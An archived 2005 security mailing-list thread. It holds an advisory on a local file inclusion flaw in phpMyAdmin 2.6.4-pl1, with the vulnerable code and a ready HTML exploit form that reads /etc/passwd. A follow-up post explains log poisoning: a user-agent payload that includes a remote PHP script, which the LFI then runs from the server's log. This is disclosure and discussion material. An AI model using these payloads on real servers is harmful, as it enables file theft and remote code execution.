PDA

Bekijk Volledige Versie : [SECURITYREASON.COM] phpMyAdmin Local file inclusion 2.6.4-pl1


max@jestsuper.pl
12/10/05, 02:45
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).18
Date: 10.10.2005
from SECURITYREASON.COM

- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is very dangerous script.

- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php

This file is included by many files. Example file index.php

- -index.php--
<?php
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
* Gets core libraries and defines some variables
*/
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
....
- -index.php--

ok so. In ./libraries/grab_globals.lib.php we have:

- -101-104-grab_globals.lib.php---------
if ( ! empty( $__redirect ) ) {
require('./' . $__redirect);
exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php---------

But before we have

- -53-67-grab_globals.lib.php-----------
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
// if a subform is present and should be used
// the rest of the form is deprecated
$subform_id = key( $_POST['usesubform'] );
$subform = $_POST['subform'][$subform_id];
$_POST = $subform;
if ( isset( $_POST['redirect'] )
&& $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
$__redirect = $_POST['redirect'];
unset( $_POST['redirect'] );
} // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php-----------

If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).

$subform = $_POST['subform'][$subform_id];
$_POST = $subform;

where array $_POST = array $_POST[subform][1]
that
$_POST['redirect']=$_POST[subform][1][redirect]

and we have local file inclusion.

Example response in html:

- -Exploit---
<CENTER>
<A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
- -Exploit---

Exploit:
http://securityreason.com/achievement_exploitalert/2

- --- 2. Greets ---

sp3x

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T
cvqCRiRlK9XrQGvV3sYxzXQ=
=yoDY
-----END PGP SIGNATURE-----
Andreas Zeidler
12/10/05, 22:25
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, Oct 10 16:11, Maksymilian Arciemowicz <max@jestsuper.pl> wrote:
> - --- 0.Description ---
> phpMyAdmin 2.6.4 is a tool written in PHP intended to
> handle the administration of MySQL over the Web.
> [...]
> phpMyAdmin is very dangerous script.
>
> - --- 1. Local file inclusion (Critical) ---
> File: ./libraries/grab_globals.lib.php

hi again,

since my post yesterday apparently had some trouble being delivered
because of a "suspicious attachment" (my pgp sig :)) i thought i'd
send it again. and this time even as a reply to the right message... :)

in case you already got this, sorry for bothering twice,


andi

- ----- quote on ---------------------------------------------------------
this is a comment on the recent phpmyadmin vulnerability[1] discovered
by maksymilian arciemowicz. i didn't really know where to post this,
so i hope this is the right place.

anyway, since i've used a file inclusion vulnerability in an older
version of phpmyadmin as a starting point for a security analysis last
weekend, and came up with a rather simple idea of how to use it for
unprivileged script execution of remote php code, i thought i'd post
this here. actually i think this method could be used on any php-based
local include vuln, so i was wondering why i couldn't yet find anything
about it on the net...

okay, the problem with local file vulns is of course, that the contents
of the file being read are not evaluated. but given php's include
statement the are -- if they contain a valid php statement. now instead
of trying to upload a file containing php code (which wasn't possible in
my case), i ask myself if there was a way to use the server to create it
for me?

the idea that hit me before falling asleep was to send the code i needed
(like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the user
agent string, this way having the web server write it into a file for
me, and in a second step simply use the already existent local file vuln
to read and the server's log file and this way execute the code.

of course this method doesn't always work. php mustn't run in safe
mode, the web server has to log user agent strings and the log files
must be accessible after privileges have been dropped. since most
people are logging in combined format, i guess the last requirement is
the most critical one, but many logs are world-readable nevertheless.
also, enabled url-based includes make things easier, but they're not
stricly necessary.

so, provided with a php local file vuln and readable log files,
executing arbitrary commands comes down to locating a suitable log file
to include. with a little guessing and the ability to read files (i.e.
the server configuration) this is not too difficult.

that's it. any comments and feedback about this is most welcome,
especially since this approach seems much too simple to not having been
used before. maybe someone can just point me to an already existing
discussion about this... :)

[1] http://www.securityfocus.com/bid/15053
- ----- quote off --------------------------------------------------------

- --
zeidler it consulting - http://zitc.de/ - info@zitc.de
karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
keine softwarepatente in europa! - http://noepatents.eu.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDTWK5V41LSDEbSrkRArkyAKCMW/Wg9XZ5BErRujvN5sjhXVeTfgCgl/Sx
CUrBPEZ35UWqjxofn9Pj9hQ=
=qJYs
-----END PGP SIGNATURE-----